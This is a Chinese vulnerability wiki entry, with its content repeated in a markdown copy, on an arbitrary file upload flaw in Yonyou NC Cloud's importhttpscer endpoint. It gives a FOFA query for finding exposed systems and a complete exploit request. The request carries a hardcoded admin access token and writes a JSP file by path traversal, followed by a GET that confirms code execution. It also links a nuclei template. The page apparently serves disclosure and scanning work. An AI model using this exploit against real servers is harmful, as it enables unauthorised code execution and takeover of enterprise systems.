fofamini-wiki

登录白背景

源码

用友NC cloud importhttpscer 存在任意文件上传

一、漏洞简介

NC Cloud是用友推出的大型企业数字化平台。用友NC cloud importhttpscer 存在任意文件上传，攻击者可利用此漏洞获取服务器权限。

二、影响版本

用友NC Cloud

三、资产测绘

fofaapp="用友-NC-Cloud"
登录页面

四、漏洞复现

POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Length: 245
Connection: close
Content-Type: multipart/form-data; boundary=uof6bcdvrhdkozsvbs3p
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Accept-Encoding: gzip, deflate

--uof6bcdvrhdkozsvbs3p
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/xsxo0es0ip.jsp"

<%out.println(111*111);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
--uof6bcdvrhdkozsvbs3p--

上传文件位置

GET /xsxo0es0ip.jsp HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Connection: close
Accept-Encoding: gzip, deflate

nuclei脚本
用友-nc-cloud-importhttpscer-任意文件上传.yaml

原文: https://www.yuque.com/xiaokp7/ocvun2/km2qhwh0d2vrlq47

# 用友NC cloud importhttpscer 存在任意文件上传

# 一、漏洞简介
NC Cloud是用友推出的大型企业数字化平台。 用友NC cloud importhttpscer 存在任意文件上传，攻击者可利用此漏洞获取服务器权限。

# 二、影响版本

- 用友NC Cloud

# 三、资产测绘

- fofa`app="用友-NC-Cloud"`
- 登录页面

![image.png](./img/gxmFTDABFOKxaPp1/1693575676700-0c5fed77-e3d1-4473-97a7-bfb8e7ae0bc1-906866.png)

## 四、漏洞复现
```
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Length: 245
Connection: close
Content-Type: multipart/form-data; boundary=uof6bcdvrhdkozsvbs3p
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Accept-Encoding: gzip, deflate

--uof6bcdvrhdkozsvbs3p
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/xsxo0es0ip.jsp"

<%out.println(111*111);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
--uof6bcdvrhdkozsvbs3p--
```
![image.png](./img/gxmFTDABFOKxaPp1/1703507639898-4969e5e2-9fd3-4ed8-8cd0-2561f351cfa0-145791.png)
上传文件位置
```
GET /xsxo0es0ip.jsp HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Connection: close
Accept-Encoding: gzip, deflate
```

![image.png](./img/gxmFTDABFOKxaPp1/1703507651424-a456dba2-291a-4fcd-b579-f04e9a10e8b6-152803.png)
nuclei脚本
[用友-nc-cloud-importhttpscer-任意文件上传.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1709219611544-e0f94afa-fd59-4b88-a75a-23a6226d6eec.yaml?_lake_card=%7B%22src%22%3A%22https%3A%2F%2Fwww.yuque.com%2Fattachments%2Fyuque%2F0%2F2024%2Fyaml%2F1622799%2F1709219611544-e0f94afa-fd59-4b88-a75a-23a6226d6eec.yaml%22%2C%22name%22%3A%22%E7%94%A8%E5%8F%8B-nc-cloud-importhttpscer-%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0.yaml%22%2C%22size%22%3A2377%2C%22ext%22%3A%22yaml%22%2C%22source%22%3A%22%22%2C%22status%22%3A%22done%22%2C%22download%22%3Atrue%2C%22taskId%22%3A%22ueb905ebe-7e66-4c01-bb60-bdbb1a35a22%22%2C%22taskType%22%3A%22upload%22%2C%22type%22%3A%22application%2Fx-yaml%22%2C%22__spacing%22%3A%22both%22%2C%22mode%22%3A%22title%22%2C%22id%22%3A%22uebcb57a3%22%2C%22margin%22%3A%7B%22top%22%3Atrue%2C%22bottom%22%3Atrue%7D%2C%22card%22%3A%22file%22%7D)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/km2qhwh0d2vrlq47>